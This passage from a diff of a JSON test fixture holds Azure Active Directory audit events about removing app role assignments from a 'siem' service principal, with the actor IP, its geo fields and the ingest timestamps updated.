Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:06.3062012Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38464434\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##2b06f483-d288-458d-b40b-af7ad69a2407_00000000-0000-0000-0000-000000000000_2b06f483-d288-458d-b40b-af7ad69a2407\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"d8a2ae24-a752-4f8e-adca-c57189a76a71\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.124872700Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"ac045271-8d7f-49b2-abc9-5130051d879f\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:06.3062012Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38464434\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##2b06f483-d288-458d-b40b-af7ad69a2407_00000000-0000-0000-0000-000000000000_2b06f483-d288-458d-b40b-af7ad69a2407\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"d8a2ae24-a752-4f8e-adca-c57189a76a71\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -1809,25 +1647,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -1841,7 +1661,7 @@ "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -1977,7 +1797,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -1989,12 +1809,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036118300Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:34:06\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"ac045271-8d7f-49b2-abc9-5130051d879f\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:06.3062012Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38464425\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##2b06f483-d288-458d-b40b-af7ad69a2407_00000000-0000-0000-0000-000000000000_2b06f483-d288-458d-b40b-af7ad69a2407\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"7f09b681-251f-4ff0-97cf-5247891b6981\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.124879300Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:06\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"ac045271-8d7f-49b2-abc9-5130051d879f\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:06.3062012Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38464425\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##2b06f483-d288-458d-b40b-af7ad69a2407_00000000-0000-0000-0000-000000000000_2b06f483-d288-458d-b40b-af7ad69a2407\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"7f09b681-251f-4ff0-97cf-5247891b6981\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -2020,25 +1840,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -2052,7 +1854,7 @@ "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -2188,7 +1990,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -2200,12 +2002,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036124900Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 